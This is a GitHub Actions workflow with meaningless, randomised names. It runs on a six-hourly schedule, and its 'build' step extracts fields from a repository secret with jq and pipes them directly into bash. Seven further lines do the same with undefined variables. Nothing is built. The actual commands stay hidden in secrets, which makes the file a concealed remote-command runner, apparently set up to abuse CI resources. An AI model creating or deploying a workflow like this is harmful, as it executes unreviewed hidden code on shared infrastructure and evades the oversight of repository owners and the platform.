name: dongzhaliang9876

on:
  workflow_dispatch:
  schedule:
    - cron: '8 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongzhaliang9876
        env:
          yk1092: ${{ secrets.yk1092 }}
        run: |
          echo $yk1092 | jq -r .ln62 | /bin/bash
          echo $yi58 | jq -r .q1 | /bin/bash
          echo $kp08 | jq -r .q1300 | /bin/bash
          echo $wpyo22 | jq -r .k180 | /bin/bash
          echo $wm46232 | jq -r .lrtio7 | /bin/bash
          echo $isbwc69462 | jq -r .bvg0 | /bin/bash
          echo $cnor737 | jq -r .cmdb9 | /bin/bash
          echo $ikq24 | jq -r .q8243 | /bin/bash

